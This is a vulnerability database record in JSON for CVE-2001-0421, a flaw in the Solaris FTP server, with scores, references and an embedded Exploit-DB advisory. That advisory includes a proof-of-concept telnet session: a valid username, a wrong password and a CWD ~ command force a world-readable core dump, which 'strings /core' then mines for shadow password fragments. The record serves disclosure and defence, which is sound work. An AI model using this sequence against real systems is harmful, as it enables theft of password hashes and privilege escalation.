{"id": "CVE-2001-0421", "bulletinFamily": "NVD", "title": "CVE-2001-0421", "description": "FTP server in Solaris 8 and earlier allows local and remote attackers to cause a core dump in the root directory, possibly with world-readable permissions, by providing a valid username with an invalid password followed by a CWD ~ command, which could release sensitive information such as shadowed passwords, or fill the disk partition.", "published": "2001-07-02T04:00:00", "modified": "2018-10-30T16:25:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0421", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/archive/1/177200", "http://www.securityfocus.com/bid/2601"], "cvelist": ["CVE-2001-0421"], "type": "cve", "lastseen": "2019-05-29T18:07:37", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "f8b677d8849e34f22a1ce934c3eed56b"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "7b58a5a32f6237302b620711e2e757ec"}, {"key": "cpe23", "hash": "7910e230fd6412532d81c2114f4d4797"}, {"key": "cvelist", "hash": "615b42fd676a5a4b5a61721abd60f999"}, {"key": "cvss", "hash": "9b257ef804cfe63c30c04ab15f4e91cd"}, {"key": "cvss2", "hash": "315d7a7b15cda393ce9fffb73645c6c3"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "881e026796273aa73041b3d9909c438b"}, {"key": "href", "hash": "fcf7df101159eb17d23c7b99b679d9d7"}, {"key": "modified", "hash": "d1973e9f44eb0483f253ba15dc8571db"}, {"key": "published", "hash": "8a28449158687ab48764c61d74809902"}, {"key": "references", "hash": "b1eb1316140b438d2f686c89ad546a34"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "c8a4f8585978e69605ab78c8797a1751"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "8323bfa1f011e721daed82b1d58b01ffc247ed0dc937eabb583e8f0de2a95038", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:8684"]}, {"type": "exploitdb", "idList": ["EDB-ID:20764"]}], "modified": "2019-05-29T18:07:37"}, "score": {"value": 5.2, "vector": "NONE", "modified": "2019-05-29T18:07:37"}, "vulnersScore": 5.2}, "objectVersion": "1.3", "cpe": ["cpe:/a:sun:solaris:2.6", "cpe:/o:sun:solaris:2.6"], "affectedSoftware": [{"name": "sun sunos", "operator": "le", "version": "5.9"}, {"name": "sun solaris", "operator": "eq", "version": "2.6"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:o:sun:solaris:2.6:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}

{"exploitdb": [{"lastseen": "2016-02-02T14:57:06", "bulletinFamily": "exploit", "description": "Solaris 2.6 FTP Core Dump Shadow Password Recovery Vulnerability. CVE-2001-0421. Remote exploit for solaris platform", "modified": "2001-04-17T00:00:00", "published": "2001-04-17T00:00:00", "id": "EDB-ID:20764", "href": "https://www.exploit-db.com/exploits/20764/", "type": "exploitdb", "title": "Solaris 2.6 FTP Core Dump Shadow Password Recovery Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/2601/info\r\n\r\nSolaris is the variant of the UNIX Operating System distributed by Sun Microsystems. Solaris is designed as a scalable operating system for the Intel x86 and Sun Sparc platforms, and operates on machines varying from desktop to enterprise server.\r\n\r\nA problem in the ftp server included with the Solaris Operating System could allow a local user to recover parts of the shadow file, containing encrypted passwords. Due to a previously known problem involving a buffer overflow in glob(), it is possible to cause a buffer overflow in the Solaris ftp server, which will dump parts of the shadow file to core. This can be done with the CWD ~ command, using a non-standard ftp client.\r\n\r\nTherefore, a local user could cause a buffer overflow in the ftp server, and upon reading the core file, recover passwords for other local users, potentially gaining elevated privileges.\r\n\r\n[root@ /usr/sbin]> telnet localhost 21\r\nTrying 127.0.0.1...\r\nConnected to localhost.\r\nEscape character is '^]'.\r\n220 sun26 FTP server (SunOS 5.6) ready.\r\nuser warning3\r\n331 Password required for warning3. <-- a valid username\r\npass blahblah <--- a wrong password\r\n530 Login incorrect.\r\nCWD ~\r\n530 Please login with USER and PASS.\r\nConnection closed by foreign host.\r\n[root@ /usr/sbin]> ls -l /core\r\n-rw-r--r-- 1 root root 284304 Apr 16 10:20 /core\r\n[root@ /usr/sbin]> strings /core|more\r\n[...snip...]\r\nlp:NP:6445::::::\r\nP:64\r\neH::::\r\nuucp:NP:6445::: ", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/20764/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F27843&zone_32=4436988)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-04/0285.html\nKeyword: sun bug ids: 4436988\nISS X-Force ID: 6422\n[CVE-2001-0421](https://vulners.com/cve/CVE-2001-0421)\nBugtraq ID: 2601\n", "modified": "2001-04-17T00:00:00", "published": "2001-04-17T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8684", "id": "OSVDB:8684", "type": "osvdb", "title": "Solaris FTP Forced Core Dump Information Disclosure", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}]}